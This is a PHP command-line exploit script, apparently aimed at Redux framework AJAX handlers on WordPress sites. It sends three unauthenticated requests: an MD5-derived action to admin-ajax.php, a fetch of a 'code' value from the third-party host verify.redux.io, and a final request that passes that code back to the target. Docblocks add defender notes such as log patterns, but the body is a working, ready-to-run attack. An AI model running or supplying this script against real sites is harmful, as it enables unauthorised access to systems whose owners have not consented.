<?php
// Check if the target URL is provided as a command-line argument
// Exactly one positional argument is required; without it, print usage and stop.
if ($argc < 2) {
    exit("Usage: php script.php <target_url>\n");
}
// Taken verbatim from the command line: nothing here checks that it is a
// well-formed URL before it is concatenated into the request URLs.
$target = $argv[1];
// Function to safely get content from URL with error handling using cURL
/**
 * Perform one HTTP GET with cURL and hand back the body only for a clean 200.
 *
 * Only the URL, return-transfer and User-Agent options are set; timeouts,
 * redirect handling and TLS options are left at cURL's defaults. No cookies,
 * credentials or extra headers are attached, so every request is anonymous.
 * A transport error or any status other than 200 is written to the PHP
 * error log and reported to the caller as null.
 *
 * @param string $url Absolute URL to request.
 * @return string|null Response body, or null when the request failed.
 */
function getUrlContent($url) {
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        // Fixed, generic User-Agent: every request made through this helper
        // carries exactly this string, which is useful when reviewing logs.
        CURLOPT_USERAGENT      => 'Mozilla/5.0',
    ]);

    $body     = curl_exec($handle);
    $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    $failed   = curl_errno($handle) || $httpCode !== 200;

    if ($failed) {
        // curl_error() must be read before the handle is closed.
        error_log("Error fetching content from URL: $url, HTTP Code: $httpCode, cURL Error: " . curl_error($handle));
    }
    curl_close($handle);

    return $failed ? null : $body;
}
// Generate MD5 hash
/**
 * Return the lowercase hexadecimal MD5 digest of $input.
 *
 * This is a plain, unkeyed digest: anyone who knows the input can compute
 * the same value, so the result must not be treated as a secret.
 *
 * @param string $input Data to hash.
 * @return string 32-character hex digest.
 */
function generateMd5($input) {
    $digest = hash('md5', $input);
    return $digest;
}
// Main function to execute the exploit
/**
 * Run the three-request sequence against $target and print the last response.
 *
 * Sequence, exactly as coded below:
 *   1. GET {target}/wp-admin/admin-ajax.php?action=md5("{target}/-redux")
 *   2. GET http://verify.redux.io/?hash=md5(<body of 1> . "-support")&site={target}
 *   3. GET {target}/wp-admin/admin-ajax.php?action=<hash from 2>&code=<body of 2>
 *
 * Defender notes:
 *   - Nothing in this flow sends a cookie, nonce or credential, so all three
 *     requests are made by an anonymous client.
 *   - Both "action" values are unkeyed MD5 digests of data any remote client
 *     can obtain (the site URL and the body returned by step 1); they do not
 *     act as a secret.
 *   - In web-server logs the pattern is two GETs to admin-ajax.php whose
 *     "action" parameter is a 32-character hex string, the second one also
 *     carrying a "code" parameter, with User-Agent "Mozilla/5.0".
 *   - Step 2 is sent over plain HTTP to a third-party host and discloses the
 *     target URL to it.
 *   - NOTE(review): the "-redux" / "-support" suffixes and the verify.redux.io
 *     host suggest the handlers belong to the Redux framework; confirm which
 *     installed component registers them and check its advisory and fixed
 *     version before relying on this description.
 *
 * Failures are logged through error_log() and a generic message is printed.
 *
 * @param string $target Base URL of the site, used verbatim in every request.
 * @return void
 */
function executeExploit($target) {
    try {
        $ajaxEndpoint = $target . '/wp-admin/admin-ajax.php';

        // Step 1: action name derived only from the target URL string.
        $key1 = generateMd5($target . '/-redux');
        $key2 = getUrlContent($ajaxEndpoint . '?action=' . $key1);
        if ($key2 === null) {
            throw new Exception('Unable to fetch the first key content');
        }

        // Step 2: second digest is built from the step-1 response body.
        $key3 = generateMd5($key2 . '-support');
        $redux_code = getUrlContent('http://verify.redux.io/?hash=' . $key3 . '&site=' . $target);
        if ($redux_code === null) {
            throw new Exception('Unable to fetch Redux code');
        }

        // Step 3: both values are sent back to the target's AJAX endpoint.
        $final_response = getUrlContent($ajaxEndpoint . '?action=' . $key3 . '&code=' . $redux_code);
        if ($final_response === null) {
            throw new Exception('Unable to fetch the final response');
        }

        echo $final_response;
    } catch (Exception $e) {
        // Details go to the error log only; the console gets a generic message.
        error_log($e->getMessage());
        echo 'An error occurred. Please check the logs for more details.';
    }
}
// Execute the exploit
// $target is passed through exactly as read from $argv[1]; no validation or
// normalisation happens between the command line and the request URLs.
executeExploit($target);
?>